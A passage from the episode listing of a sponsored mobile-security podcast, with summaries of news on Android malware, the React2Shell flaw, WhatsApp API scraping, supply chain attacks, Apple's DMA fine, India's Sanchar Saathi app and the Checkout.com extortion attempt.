    • AphyOS & The Subscription Model: Unlike standard Android phones, the MC03 relies on a subscription model (approx. $10/month after the first year) to fund security updates and infrastructure rather than selling user data to ad networks.
    • Security Architecture: The device splits the user experience into a secure "Vault" for vetted apps (like Proton and Signal) and a "Wild Web" environment for general Android apps, allowing users to isolate risky applications.
    • Hardware Highlights: The phone features a 6.67" OLED screen, IP68 rating, and a 5,200 mAh removable battery—a design choice driven by upcoming EU regulations regarding repairability.
    • Overcoming Past Failures: We discuss how the MC03 improves upon the "difficult-to-recommend" MC02 with a smoother onboarding process, an improved 64MP camera, and the option to install the Play Store for users who can't go fully cold-turkey.
    • The Competition: How the MC03 stacks up against other privacy-focused devices like the Murena Fairphone and other non-GMS ROMs like GrapheneOS.

    Sponsor: This episode is brought to you by Approov. Protect your mobile APIs from scripts, bots, and modified apps. Ensure that the requests you receive are from the genuine mobile app you released. Visit approov.com to learn more about comprehensive mobile app security.

    Relevant Links & Source Materials:
    • ZDNET Review: Want real phone privacy? This $700 handset promises it – Coverage of the US launch, pricing, and removable battery features.
    • Android Police Coverage: Can you de-Google without the headache? – An in-depth look at the onboarding improvements and specs.
    • Punkt Official Site: The MC03 Product Page – Direct specs and philosophy from the manufacturer.
    • Murena / /e/OS: The Murena Fairphone Review – Context on the competitor mentioned in the episode.

    Keywords: Punkt MC03, AphyOS, Non-GMS, De-Google, Mobile Privacy, Data Sovereignty, Removable Battery, Android Security, Fairphone, Murena, Apostrophy OS, Mobile Security.

    Disclaimer: Information regarding pricing ($699 device / $10 monthly sub) and release dates (Spring 2026 for US) is based on reports from ZDNET and Android Police coverage of CES 2026.

  12. 111

    Unmasking "Wonderland" – The New Wave of Android Droppers & SMS Stealers

    In this episode of Upwardly Mobile, we dive deep into the evolving landscape of Android malware. We break down the emergence of Wonderland (formerly WretchedCat), a sophisticated SMS stealer targeting users in Uzbekistan through legitimate-looking "dropper" applications. We explore how threat actors, specifically the "TrickyWonders" group, are leveraging Telegram and malicious ad campaigns to bypass security checks and hijack devices. We also discuss the broader trend of Malware-as-a-Service (MaaS), including new threats like Cellik, Frogblight, and NexusRoute that are lowering the barrier to entry for cybercriminals globally. From real-time screen streaming to bypassing Google Play protections, we analyze the tactics defining modern mobile security threats.

    Key Topics Discussed:
    • The Rise of Droppers: How malware operators are shifting from "pure" Trojans to "droppers" (like MidnightDat and RoundRift) that appear harmless to evade detection before deploying payloads.
    • Wonderland's Capabilities: How this malware establishes bidirectional communication to intercept OTPs, steal contacts, and execute USSD requests.
    • The MaaS Economy: A look at the "Cellik" RAT, which offers one-click APK building to bundle malware inside legitimate apps, and "Frogblight," which targets users via fake court documents.
    • Government Impersonation: How "NexusRoute" is targeting users in India by mimicking government service portals to steal financial data and UPI PINs.
    • Defense Strategies: The importance of blocking unknown source installations and monitoring for suspicious SMS/USSD patterns.

    Sponsored By: This episode is brought to you by Approov. Stop mobile app abuse and API misuse. Ensure that the requests your API handles are from the genuine mobile app running on a safe mobile device. 👉 Visit our sponsor: https://approov.io

    Relevant Links & Source Materials:
    • The Hacker News: Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at Scale
    • SC Media: Android malware Wonderland evolves with dropper apps targeting Uzbekistan
    • Cypro: Security Analysis of Android Malware Operations

    Keywords: Android Malware, Wonderland, SMS Stealer, Dropper Apps, Mobile Security, Remote Access Trojan (RAT), TrickyWonders, Cybersecurity, One-Time Password (OTP) Theft, Malware-as-a-Service, Approov.

  13. 110

    2026 Mobile API and AI Security Predictions

    Episode Summary: In this episode of Upwardly Mobile, we audit the accuracy of Approov’s 2025 cybersecurity forecast. Of the seven trends predicted, four proved to be "absolutely correct." We break down these key hits: the dual-use of AI by attackers and defenders, the undeniable dominance of cross-platform development, the crackdown on open-source supply chain risks, and the heavy impact of new global breach reporting mandates.

    The 4 Mobile Security Trends That Defined the Year

    Key Topics — The 4 Correct Predictions:
    • 1. AI’s Double-Edged Sword: We discuss how 2025 wasn't just about AI hype—it was about operational impact. Attackers utilized LLMs to lower the bar for API abuse and generate scripts to bypass WAFs, while defenders leaned on AI for anomaly detection and scan interpretation to speed up code reviews.
    • 2. Cross-Platform is King: The prediction that cross-platform development would be "the way forward" held true. We analyze how Flutter and React Native maintained dominance in 2025, becoming the norm for enterprise and fintech apps, though Huawei’s HarmonyOS remained a regional outlier.
    • 3. The Open Source Crackdown: Scrutiny on open-source software (OSS) intensified as predicted. With attackers targeting ecosystems like npm and PyPI, and regulations like the EU CRA enforcing SBOMs, organizations were forced to verify their supply chains and adopt runtime protection to catch tampering.
    • 4. The Breach Reporting Crunch: Approov correctly forecasted that breach reporting would demand massive investment. With the EU NIS2 Directive and PCI DSS 4.0 coming into full effect, the focus shifted from simple disclosure to operational resilience—requiring companies to report incidents in hours, not days.

    Featured Resources & Links:
    • Approov Report: Approov Predicted 7 Mobile Cybersecurity Trends for 2025 - Did They Happen? – The full retrospective on which predictions hit the mark and which were too optimistic (like the adoption of certificate pinning).
    • Expert Insights: LW Roundtable: Mandates Surge, Guardrails Lag – Further reading on the friction between compliance mandates and security realities.

    Sponsor: This episode is brought to you by Approov. Don’t let your mobile app be the weak link. Approov provides comprehensive runtime security, ensuring that only your genuine app communicates with your API.
    • Visit: approov.io
    • Solutions: Runtime Secrets Protection and Mobile API Security.

    Keywords: Mobile Security, Cybersecurity Predictions, AI Threats, Flutter, ReactNative, Open Source Security, SBOM, NIS2 Compliance, Supply Chain Attacks, Approov, API Security.

  14. 109

    The 3.5 Billion WhatsApp Scraping Flaw: Is Your Mobile API Leaking?

    Episode Summary: In this episode, we break down a massive vulnerability discovered by researchers at the University of Vienna and SBA Research that allowed them to scrape data from roughly 3.5 billion WhatsApp accounts globally. We explore how a lack of rate limiting on the specific GetDeviceList API endpoint turned a benign contact discovery feature into a massive "enumeration oracle," allowing a single university server to query over 100 million numbers per hour. We discuss the types of data exposed—including active status, device types, public encryption keys, and millions of profile photos—and the implications for user privacy, particularly in regions where WhatsApp is banned like China and Iran. Finally, we cover Meta’s response to the disclosure and why industry experts are calling this a "masterclass in negligence" regarding API security.

    Key Topics Discussed:
    • The Vulnerability: How researchers used the GetDeviceList API to bypass safeguards and identify valid accounts across 245 countries.
    • The Scale: How a single server sustained 7,000 requests per second to verify 3.5 billion accounts without being blocked.
    • The Data: The exposure of profile images, "about" text, and public keys, and how this data correlates with previous Facebook leaks.
    • The Security Lesson: Why "does this number exist?" lookup APIs are inherently dangerous without strict behavioral monitoring and rate limiting.

    Sponsor: This episode is supported by Approov. When mobile app security is an afterthought, user privacy becomes collateral damage. Approov ensures that only genuine mobile app instances, running on safe mobile devices, can access your backend APIs. Visit the Sponsor: https://approov.io

    Featured Sources & Further Reading:
    • BleepingComputer: WhatsApp API flaw let researchers scrape 3.5 billion accounts – Detailing the mechanics of the GetDeviceList abuse and the global scope of the data scrape.
    • Malwarebytes: WhatsApp closes loophole that let researchers collect data on 3.5B accounts – Analysis of the privacy implications, including the exposure of users in restrictive regimes.
    • Privacy Guides: WhatsApp contact discovery vulnerability identifies 3.5 billion users – Discussing the patch and how alternative messengers handle contact discovery.

    Keywords: WhatsApp, API Security, Rate Limiting, Data Scraping, Mobile Security, Cybersecurity, Meta, Privacy, Enum, GetDeviceList, Infosec, Approov.

  15. 108

    Apple's DMA Non-Compliance: An Open Letter

    In this episode of *Upwardly Mobile*, we break down the seismic shift in the mobile app landscape following the European Commission’s decision to formally fine Apple €500 million for breaching the Digital Markets Act (DMA). We explore why regulators view Apple’s recent changes not as genuine adherence to the law, but as "malicious compliance"—a deliberate attempt to technically meet requirements while maintaining control and fees.

    We also discuss the December 2025 Open Letter sent by app developers to EU President Ursula von der Leyen, which argues that Apple’s new 20% commission on external transactions continues to violate the law and stifle fair competition. Finally, we contrast the situation in Europe with recent US court rulings involving Epic Games, where judges have ordered Apple to stop charging for services it doesn't provide, raising the question: Why are European developers getting a worse deal?

    Key Topics Discussed:
    *   **The €500M Fine:** The European Commission found Apple in breach of "anti-steering" obligations, restricting developers from directing users to cheaper offers outside the App Store.
    *   **"Malicious Compliance":** An analysis of how Apple’s fee structures and "scare screens" are viewed by critics and regulators as structural impediments to the DMA’s goals.
    *   **The Meta Connection:** A look at the parallel €200M fine imposed on Meta regarding their "pay or consent" model.
    *   **The Developer Pushback:** Insights from the "CleanV2" Open Letter, where developers demand the removal of new commission fees that range up to 20%.
    *   **Transatlantic Tensions:** How the US Ninth Circuit Court of Appeals ruling regarding Epic Games highlights disparities in global enforcement.

    **Sponsor:** This episode is brought to you by **Approov**. Securing mobile apps is hard; Approov makes it easy. Ensure your APIs are only accessed by genuine instances of your mobile app and block scripts, bots, and modified apps. **Visit: [https://approov.io](https://approov.io)**

    **Resources & Source Materials:**
    *   **European Commission Press Release:** Details on the April 2025 fine regarding Apple’s anti-steering practices.
    *   **Kluwer Competition Law Blog:** "The DMA's Teeth: Meta and Apple Fined by the European Commission" by Alba Ribera Martínez.
    *   **Clean App Foundation Open Letter:** The December 2025 appeal to the European Commission regarding Apple's persistent non-compliance.
    *   **Analysis of US Rulings:** Context on the Epic Games vs. Apple court case and fee limitations.

    Keywords: Digital Markets Act, DMA, Apple Fine, App Store Fees, Anti-Steering, Malicious Compliance, European Commission, Margrethe Vestager, Sideloading, Epic Games, Mobile App Security, Tech Policy, Antitrust.

  16. 107

    Chinese Hackers & the React2Shell Crisis

    This week, we dive deep into the critical, maximum-severity security flaw known as React2Shell (tracked as CVE-2025-55182). This vulnerability, which impacts React, the widely-used open-source JavaScript library, allows for unauthenticated remote code execution (RCE) through specially crafted HTTP requests on affected servers.

    The episode explores the immediate aftermath of the disclosure. Exploitation attempts began quickly, with Amazon Web Services (AWS) reporting that multiple China-linked threat groups, specifically Earth Lamia and Jackpot Panda, were exploiting the flaw within hours of its public availability. These actors are using both automated tools and individual exploits, and some are even actively debugging and refining their techniques against live targets. Earth Lamia has been active since at least 2023, targeting various industries in Latin America, the Middle East, and Southeast Asia, while Jackpot Panda focuses on cyberespionage operations in Asia.

    We also discuss the significant collateral damage caused by the urgent need to patch this flaw. Internet infrastructure giant Cloudflare experienced a widespread global outage, returning "500 Internal Server Error" messages worldwide, and attributed the incident to an emergency patch deployed to mitigate the industry-wide React2Shell vulnerability. This change was related to how Cloudflare’s Web Application Firewall parsed requests.

    Finally, we clarify the scope of the vulnerability: React2Shell primarily impacts server-side components. Specifically, it affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0, particularly instances using a relatively new server feature. Standard React Native mobile apps are generally safe, but any backend built using Next.js (App Router) or React 19 Server Components that communicates with the mobile app is at critical risk. Furthermore, developers need to be aware of a separate, but timely, vulnerability (CVE-2025-11953) affecting the local React Native CLI development server.

    Key Concepts and Takeaways
    • Vulnerability: React2Shell, CVE-2025-55182, is a critical vulnerability allowing unauthenticated remote code execution on affected servers.
    • Scope: Impacts the React open-source JavaScript library, particularly React version 19 and dependent React frameworks such as Next.js (App Router). Cloud security giant Wiz reported that 39% of cloud environments contain vulnerable React instances.
    • Threat Actors: Exploitation is linked to China-linked threat groups, including Earth Lamia and Jackpot Panda.
    • Major Impact: An emergency mitigation patch designed to address React2Shell caused a widespread global outage at Cloudflare.
    • Fix: Patches were available shortly after disclosure, reported to Meta on November 29 and patched on December 3. Users must upgrade affected dependencies like react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack to version 19.0.1 or higher.

    Resources and Links
    • SecurityWeek (Source Context): (Note: Specific articles discussed are embedded within the episode content.)
    • Expo Changelog: For specific SDK patch instructions.
    • Sponsor Link: Protecting mobile app integrity against security threats is vital: approov.io

    Keywords (Optimized for SEO): React2Shell, Remote Code Execution (RCE), China-linked hackers, Earth Lamia, Jackpot Panda, React Server Components (RSC), Next.js vulnerability, React 19 security, web security, patch management, cyber espionage, critical vulnerability, application security

  17. 106

    Sanchar Saathi | The Mobile App Triggering India's Surveillance Firestorm

    Sanchar Saathi: The Mandatory Cyber Safety App Triggering India's Surveillance Firestorm

    In this critical episode of "Upwardly Mobile," we dive into the escalating controversy surrounding India's Sanchar Saathi app, a government-mandated digital tool that is fueling a nationwide debate over state surveillance and digital privacy. Designed as a citizen-centric safety tool to combat telecom fraud and track lost or stolen devices using their unique IMEI, the app has been lauded by the government for its success in blocking millions of fraudulent connections and stolen phones. However, a recent directive mandating its pre-installation on all new smartphones sold in India has drawn fierce criticism from privacy advocates, opposition politicians, and major tech firms.

    What You Will Learn in This Episode:

    The Core Conflict: Safety vs. Snooping
    • The Mandate: The Indian telecom ministry privately ordered all smartphone manufacturers to preload Sanchar Saathi on new devices within 90 days, requiring the app to be "visible, functional, and enabled" upon first setup. This directive could eventually roll out the app to more than 735 million existing phone users via software updates.
    • Government Defense: Officials state the app is strictly for cyber security and curbing the "serious endangerment" caused by IMEI tampering, promising adequate security for personal information. They also claim the app is optional and does not read private messages.
    • Surveillance Fears: Privacy experts and the political opposition argue the mandate is unconstitutional and creates a massive surveillance surface area. Opposition leaders have even compared the move to 'Pegasus'.

    Technical Deep Dive into Privacy Risks
    • The Sanchar Saathi app requests a range of "dangerous" or "high-risk" permissions.
    • The app has the capability to read call logs and all incoming SMS, technically allowing it to parse bank transaction alerts, 2FA codes, and map a user's social graph.
    • It accesses device identifiers, binding a user's identity to the hardware IMEI, which breaks standard rules for resettable identifiers and aids tracking.
    • If pre-installed as a system-level application (the proposed state), experts warn that permissions could be auto-granted without user consent, the app could run continuous background services, and it would be virtually impossible for 99% of users to uninstall.
    • The privacy policy is weak, lacking explicit mechanisms for data deletion, correction, or a clear opt-out feature.

    Industry Resistance
    • Tech giants were given 90 days to comply with the pre-installation mandate.
    • Apple has specifically resisted the mandate, citing concerns over privacy and system security, as iPhones require explicit user confirmation for permissions and prevent automatic background registration.
    • The mandate is technically easier to implement on Android devices, which make up over 95% of the Indian smartphone market.

    Keywords: Sanchar Saathi, India digital privacy, state surveillance, government mandate, telecom fraud, cyber safety app, IMEI tracking, pre-installation controversy, Android security, iOS privacy, Apple resistance, call log permissions, data deletion rights, digital rights, Indian politics.

    Digital Autonomy and the Sanchar Saathi App
    Link 1: https://indianexpress.com/article/explained/explained-sci-tech/telecom-scindia-sanchar-saathi-optional-key-concerns-10397728/
    Link 2: https://www.ndtv.com/india-news/sanchar-saathi-communications-ministry-jyotiraditya-scindia-big-brother-or-cybersafety-boost-deep-dive-into-sanchar-saathi-app-9735477
    Link 3: https://indianexpress.com/article/technology/tech-news-technology/sanchar-saathi-app-preinstalled-android-ios-privacy-security-concerns-10397922/
    Link 4: https://www.bbc.com/news/articles/cedxyvx74p4o
    Link 5: https://www.reuters.com/sustainability/boards-policy-regulation/what-is-indias-politically-contentious-sanchar-saathi-cyber-safety-app-2025-12-02/

    Sponsor: This episode is brought to you by Approov Mobile Security, helping developers secure their mobile APIs and prevent reverse engineering and unauthorized data access. Sponsor Website: approov.io

  18. 105

    Supply Chain Security Unpacked: Combating Dependency Confusion & Poisoned Pipelines

    Supply Chain Security Unpacked: Combating Dependency Confusion, Poisoned Pipelines

    Episode Notes: The software supply chain, the "backbone of modern software development," is under unprecedented assault, with attacks aimed at libraries and development tools soaring by an astounding 633% year-over-year. This episode explores the evolution of supply chain threats, examining everything from software vulnerabilities and malicious maintainers to hidden risks lurking in hardware and commercial binaries, and details the cutting-edge defenses developers are deploying to fight back.

    The Evolving Threat Landscape: Implicit Trust Exploited

    Modern attacks exploit the implicit trust developers place in package managers and public repositories. Key threats discussed include:
    • Dependency Confusion: First identified by Alex Birsan, this attack exploits package managers that prioritize packages found in public repositories (especially those with a higher version number) over identically named private packages. Attackers use reconnaissance to pinpoint internal package names (often by examining manifest files like package.json), publish a malicious package with the same name and a higher version to a public repository, and wait for the target application's build process to pull and execute the malicious code. Vectors for this attack include exploiting namespaces, DNS Spoofing, and manipulating CI/CD security settings.
    • Widespread Malware and Stolen Secrets: The npm ecosystem was recently hit by the self-replicating "Shai-Hulud" worm, which compromised over 500 packages and harvested sensitive credentials, including GitHub Personal Access Tokens (PATs) and API keys for cloud services like AWS, GCP, and Microsoft Azure. Stolen credentials remain a reliable attack vector, leading to incidents where attackers published malicious code on behalf of trusted entities (e.g., Nx, rspack).
    • Poisoned Pipelines and Malicious Maintainers: Highly sophisticated attackers are compromising build and distribution systems directly, bypassing code reviews. This includes notorious attacks like SolarWinds and compromises targeting GitHub Actions pipelines (e.g., Ultralytics and reviewdog/actions-setup). Furthermore, the XZ Utils backdoor highlighted the risk of malicious maintainers who build trust over years before inserting sophisticated backdoors into critical open-source projects.
    • Code Rot and Vulnerable Open Source: A survey of popular open-source packages found them rife with vulnerabilities, with an average of 68 vulnerabilities across 30 packages scanned, including many critical and high-severity flaws. Even actively maintained, high-traffic packages like Torchvision contained dozens of vulnerabilities, despite frequent updates.

    Defense and Verification: Making Trust Explicit

    To counter these escalating threats, the industry is focusing on making trust assumptions explicit and verifiable:
    • Supply-chain Levels for Software Artifacts (SLSA): SLSA is a security standard that helps consumers verify the process by which an artifact was created using a signed provenance file. Achieving Level 3 compliance involves stringent build platform hardening to prevent the forgery of provenance files.
    • Trusted Publishing and Attestations: Platforms like PyPI have implemented Trusted Publishing, which removes the need for developers to manage long-lived API tokens by utilizing short-lived OIDC tokens issued by the build platform. Building on this, digital attestations (driven by PEP 740) cryptographically bind published packages to their build provenance using Sigstore.
    • CI/CD Security Tools: Tools like Zizmor perform static analysis for GitHub Actions to flag subtle vulnerabilities like template injection or dangerous triggers. Capslock is an experimental tool used for Go language packages that statically identifies capabilities (like network access or file system operations), allowing developers to verify what code can actually do, regardless of where it came from.
    • Preventing Confusion: Developers can mitigate Dependency Confusion through strict naming conventions, proactively reserving namespaces (or "namesquatting" on platforms like PyPI), utilizing private package repositories with stringent access controls (RBAC/MFA), and enforcing package whitelisting and version locking using files like package-lock.json.
    • Verifying Commercial Binaries: Risks also lurk in closed-source commercial software ("black-box" binaries). The compromise of Justice AV Solutions (JAVS) demonstrated how malware (RustDoor) can be implanted in a backdoored installer; sophisticated tools like differential analysis are necessary to detect signs of tampering and unvetted files (such as the typosquatted ffmepg.exe). Organizations must adopt a "Don't Trust, but Verify" approach to all software received from suppliers.
    • The Future of Vulnerability Management: The cybersecurity community is moving beyond sole reliance on CVEs, especially following the NVD backlog experienced in 2024. Comprehensive security now requires visibility into threats like malware, tampering, secret leaks, and lack of hardening, rather than just known vulnerabilities. NIST SP 800-204D outlines crucial strategies for integrating SSC security measures—including generating provenance data—into DevSecOps CI/CD pipelines.

    Relevant Links and Resources:
    • Learn more about Dependency Confusion Prevention and DevSecOps Orchestration: approov.com
    • NIST SP 800-204D: Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines: https://doi.org/10.6028/NIST.SP.800-204D

    Keywords: Software Supply Chain Security, Dependency Confusion, Hardware Trojan, SLSA Framework, CI/CD Pipeline Security, DevSecOps, Trusted Publishing, PyPI, npm, Zizmor, Build Provenance, Side-Channel Attacks, Malware, Cryptojacking, NVD Backlog, Digital Attestations, Zero Trust.

  19. 104

    How the Aisuru 'Turbo Mirai' Botnet Reshaped Mobile DDoS Warfare

    The Multi-Terabit Battlefield: How the Aisuru 'Turbo Mirai' Botnet Reshaped Mobile DDoS Warfare

    On November 18, 2025, a massive Cloudflare service interruption took down major platforms worldwide, including X, ChatGPT, Shopify, and various critical transit services. Given the intense, ongoing cyber conflict, initial speculation immediately pointed toward a successful, hyper-volumetric Distributed Denial-of-Service (DDoS) attack.

    Cloudflare has recently been at the forefront of blocking unprecedented assaults from notorious botnets, including Mirai and the newer, "TurboMirai-class" Aisuru botnet. The company successfully mitigated record-breaking Mirai-variant attacks measured at 5.6 Tbps (October 2024) and 7.3 Tbps (May 2025). Furthermore, the Aisuru botnet, which is responsible for hitting Microsoft Azure with a 15.72 Tbps DDoS attack, was also linked to a 22.2 Tbps attack mitigated by Cloudflare in September 2025. Aisuru operators were even caught attempting to manipulate Cloudflare’s public domain rankings using malicious query traffic. This track record provided a clear motive for a potential reprisal.

    However, Cloudflare’s official investigation quickly dispelled fears of a successful cyberattack. Cloudflare CTO Dane Knecht confirmed that the incident was not an attack, but rather an internal issue. The cause was identified as a "latent bug" in a service underpinning Cloudflare’s bot mitigation capability that started to crash following a routine configuration change. This technical flaw cascaded into a broad degradation across the network. Cloudflare CEO Matthew Prince later noted that this was the worst outage the company had experienced since 2019.

    This incident highlights that while automated security platforms like Cloudflare can defend against 20+ Tbps DDoS attacks, they remain vulnerable to complex internal technical flaws and configuration management errors.

    Keywords: Cloudflare outage, DDoS, Aisuru Botnet, Mirai, Configuration error, Latent bug, Dane Knecht, November 2025, IoT security, Incident Response, Cyberattack, Network Security, Cloud Security.

    Hashtags: #ConfigurationManagement #IncidentResponse #CloudSecurity #IoT

    Related Links & Sources: To read more about the incident and the cyber threat landscape, please refer to the following:
    • Cloudflare Outage Not Caused by Cyberattack (SecurityWeek)
    • Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses
    • Cloudflare’s official report on the November 18, 2025 outage
    • Discussion on the configuration file bug
    • TurboMirai-Class ‘Aisuru’ Botnet Blamed for 20+ Tbps DDoS Attacks

    Sponsor Message: Today’s episode is brought to you by Approov. In an era where botnets like Aisuru are exploiting every vulnerability, securing your APIs and endpoints is paramount. Approov provides essential mobile app and API protection, ensuring that only trusted, legitimate clients can connect to your back-end services, providing a crucial layer of defense against sophisticated automated attacks. Learn more about protecting your mobile infrastructure at approov.com.

  20. 103

    Black Friday's Hidden Threat: Stopping AI-Powered Fraud and Mobile Commerce Exploits

    Black Friday's Hidden Threat: Stopping AI-Powered Fraud and Mobile Commerce Exploits

    The biggest shopping days of the year, Black Friday and Cyber Monday, have also become the prime hunting grounds for cybercriminals, with global financial losses from attacks predicted to hit $10 billion in 2024. In this episode, we dive deep into the statistics shaping financial cybersecurity during the holiday shopping season, focusing on how AI-driven scams and mobile app vulnerabilities are creating a perfect storm for retailers and consumers alike.

    Episode Highlights

    The State of Financial Cybercrime: Cybercriminal activity spikes by 70% during Black Friday compared to regular shopping days. Cyberattacks during this period were projected to rise by 20% in 2024, following a 15% increase in 2023.

    Key Threats and Data:
    The Rise of Fake Shops: Scammers are evolving at an unprecedented pace, using AI to generate persuasive copy and fully functional storefront templates that mimic legitimate communication flawlessly. A recent analysis found a 250% jump in fake Black Friday shops leading up to the sales weekend.
    Targeting E-commerce: E-commerce platforms experience a 65% surge in phishing attacks. Phishing remains the most common threat, accounting for 42% of attacks on financial transactions during the 2023 holiday shopping period.
    Prevalent Fraud Types: Financial institutions report detecting 30% more fraudulent transactions during Cyber Monday. Card-not-present fraud was the leading method in 2023, accounting for over 75% of online fraud cases. Credential stuffing incidents surged by 80% during Cyber Monday in 2023, affecting over 40 million accounts globally.
    The Cost: Financial fraud during holiday shopping periods accounts for nearly $8.5 billion annually. Small and medium-sized businesses (SMBs) are highly vulnerable, reporting an average loss of $120,000 per cyberattack.

    The Mobile Frontline: While many focus on suspicious websites, the real cybersecurity frontline for e-commerce is increasingly inside mobile apps. Attacks on shopping apps increased by 50% in 2023, often involving malicious app clones. Attackers intercept API traffic with man-in-the-middle (MitM) proxies and extract API keys by reverse-engineering app binaries. Standard defenses like TLS and certificate pinning are necessary but incomplete: pinning lives in the app, so it can be stripped from a repackaged clone or hooked out at runtime on a rooted or jailbroken device, and a key recovered from the binary works from any client regardless of how the original app protected its connection.

    Industry Response: Financial institutions are bolstering security by integrating biometric authentication into 50% of mobile banking apps, adopting real-time transaction monitoring (reducing fraud by 40%), and using tokenization in 65% of online transactions. Zero Trust architecture is also gaining traction, with 55% of organizations adopting it to secure financial systems.

    Sponsor Spotlight: This episode is brought to you by Approov, the mobile security platform addressing vulnerabilities where they start: the mobile API. Approov provides a pragmatic defense-in-depth approach by ensuring that only genuine, unmodified apps connect to your backend. Approov neutralizes Black Friday exploits by using dynamic attestation to verify app integrity, and protects against API key theft by delivering short-lived, attested tokens at runtime, so API keys never reside in the app binary. Protect your mobile commerce from sophisticated fraud. Learn more about Approov's Mobile API Protection: approov.com

    Relevant Source Links. For more information and detailed statistics referenced in this summary:
    Financial Cybersecurity Statistics for Black Friday and Cyber Monday 2025 (via CoinLaw): [Link to CoinLaw Article]
    Online scams skyrocket before Black Friday – NordVPN warns what shoppers should watch out for (via TechRadar): [Link to TechRadar Article]
    Black Friday Fraud: The Hidden Threat in Mobile Commerce

    Keywords & Hashtags (SEO Optimized)
    Keywords: Black Friday, Cyber Monday, cybersecurity statistics, financial fraud, e-commerce security, mobile commerce, API protection, card-not-present fraud, phishing scams, ransomware, credential stuffing, AI-powered scams, fake shops, Approov, NordVPN, retail cybercrime, tokenization, Zero Trust.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.

  21. 102

    X Joins App Fairness Coalition to Combat Monopolies

    In this pivotal episode of Upwardly Mobile, we dive into the significance of X (formerly Twitter) joining the Coalition for App Fairness (CAF). The move signals growing momentum in the global effort to reform the mobile app ecosystem, currently dominated by Apple and Google, whose practices are alleged to harm consumers and developers alike. We examine X's commitment to dismantling monopolistic practices and fostering a digital future where competition thrives and innovation is rewarded. We also discuss the context of this fight, including the recent U.S. Department of Justice (DOJ) antitrust complaint filed against Apple. CAF asserts that Apple's alleged illegal conduct, including abusing App Store guidelines to increase prices and choke off competition, must be addressed, and urges Congress to pass legislation like the Open App Markets Act. Tune in to understand how companies are pushing back against the "shackles on developers" to create a level playing field for the more than 80 members of this independent nonprofit organization.

    Discussion Points
    Dismantling Monopolies: X's Head of Global Government Affairs stated that joining CAF is a testament to their commitment to dismantling monopolistic practices and building a mobile ecosystem that truly serves its users and fosters growth.
    The Problem with Gatekeepers: The current mobile app ecosystem is dominated by Apple and Google, who use their power to harm developers and users through excessive costs and restrictions on innovation. CAF's Global Policy Counsel noted that businesses on platforms like X are harmed by these anticompetitive app store practices.
    The Antitrust Fight: The DOJ, along with 16 attorneys general, filed an antitrust complaint against Apple, accusing the company of illegally monopolizing smartphone markets. CAF supports this strong stand against Apple's "stranglehold over the mobile app ecosystem".
    The Path Forward: CAF advocates for legislation, like the Open App Markets Act, to create a free and open mobile app marketplace and put an end to the anticompetitive practices of all mobile app gatekeepers.
    About CAF: The Coalition for App Fairness is an independent nonprofit organization focused on protecting consumer choice, fostering competition, and creating a level playing field for app and game developers globally.

    Approov Sponsored Segment: Increasing regulatory and commercial pressures are weakening app store monopolies. As the mobile ecosystem decentralizes, robust, independent security becomes crucial. Our sponsor, Approov, provides app-centric security that operates independently of basic app store protections. Approov helps mobile app developers reduce security dependencies on app stores by delivering runtime protection and attestation for mobile apps and their APIs, shielding against tampering and unauthorized access. This decentralizes security, so developers are not limited by the basic security checks provided by Apple, Google, or any third-party app store (especially relevant as regulations like the EU DMA take effect).

    Key security features include:
    Dynamic Certificate Pinning: Secures connections against man-in-the-middle attacks and allows pin sets to be updated over the air (OTA) instantly, without republishing through app stores. The practical point is that a pinned certificate that rotates or is revoked no longer forces an emergency app release.
    Just-in-Time Secrets Management: API keys and secrets are removed from the app and delivered only to verified app instances, protecting against reverse engineering and credential scraping.
    Run-time Application Self-Protection (RASP): Provides real-time shielding against threats like OS manipulation or hostile frameworks, regardless of how or where the app is distributed, including alternative app stores.
    This ability to deliver critical updates and security policies directly from Approov's cloud platform ensures the quickest possible response to threats, bypassing store-mediated app updates.

    Keywords: X, Twitter, Coalition for App Fairness (CAF), Mobile App Ecosystem, App Store Monopolies, Antitrust, Apple Antitrust, Google Play Store, Developer Freedom, App Competition, Open App Markets Act, Approov, App Security, API Protection, Runtime Protection, App Attestation, EU DMA.

    Relevant Links
    X Joins CAF Announcement: [Link to source]
    CAF Mission & Membership: appfairness.org
    DOJ Antitrust Complaint Context: [Link to source]
    Sponsor Approov: Secure your mobile apps independently of app stores at approov.com
    Approov Security Details:
    How Approov Works: [Link to source]
    Approov vs. Mobile App Hardening: [Link to source]
    Approov's Role in a Post-DMA Landscape: [Link to source]

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast. This episode includes AI-generated content.

  22. 101

    Standing Up to Extortion: Lessons from the Checkout.com Breach

    Standing Up to Extortion: Lessons from the Checkout.com Breach and the Rise of Vishing Attacks

    Description: This week on Upwardly Mobile, we dive deep into the tactics of the prolific criminal group ShinyHunters and explore how global enterprises are responding to sophisticated cyber extortion attempts in 2025. We analyze two major security incidents that highlight critical weaknesses in legacy systems and modern OAuth ecosystems.

    The Extortion Dilemma: Checkout.com Stands Firm. We detail the incident in which Checkout.com was contacted by ShinyHunters, who demanded a ransom after gaining unauthorized access to a legacy, third-party cloud file storage system. The system was used in 2020 and prior years for internal operational documents and merchant onboarding materials, and the exposure affects less than 25% of the current merchant base. Critically, the threat actors did not access merchant funds or card numbers, and the live payment processing platform was not impacted. Checkout.com publicly stated that it would not be extorted and refused to pay. Instead, it is turning the attack into an investment for the whole security industry by donating the ransom amount to Carnegie Mellon University and the University of Oxford Cyber Security Center to fund cybercrime research. The company accepted full responsibility for the legacy system not having been properly decommissioned. The lesson for defenders is the unglamorous one: an inventory of third-party storage and SaaS tenants, with a decommissioning date attached to each, is what closes doors like this before an extortion crew finds them.

